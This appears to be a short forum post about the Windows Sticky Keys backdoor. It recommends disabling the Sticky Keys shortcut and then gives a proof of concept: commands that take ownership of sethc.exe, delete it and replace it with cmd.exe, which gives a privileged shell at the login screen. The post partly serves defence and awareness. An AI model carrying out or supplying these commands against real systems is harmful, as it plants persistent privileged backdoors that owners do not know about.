This *exploit* is really a default feature built into Windows systems XP and higher (also found on Server editions)
While not an exploit in and of itself unless system files are altered, it's just one example of permission elevation that can backdoor an attacker into a system.
Now, to exploit this feature requires access to the system at an Admin level, so it isn't a vulnerability in and of itself. However it does appear to be an abuse of privilages that is often used to attack systems.
simply navigate to Accessibility Options > Keyboard > Sticky Keys > Settings Configurations and uncheck the "keyboard shortcut"
I would recommend disabling this 'feature' out of principle to make Windows a little tighter. It is enabled by default on every platform I've tested (XP, 7, 10, Server).
Proof of concept...
:: View file ownership details C:\Windows\System32>icacls sethc.exe C:\Windows\System32\sethc.exe NT SERVICE\TrustedInstaller:F BUILTIN\Administrators:R NT AUTHORITY\SYSTEM:R BUILTIN\Users:R :: copy target (cya) copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc-old.exe :: take ownership of target (have to be admin) takeown C:\Windows\System32\sethc.exe :: gain full permissions on file icacls "sethc.exe" /grant "Administrators":F (substitute whatever user/group you want) :: delete original sethc.exe file del C:\Windows\System32\sethc.exe :: copy cmd.exe and name it sethc.exe (cmd has same privs) copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe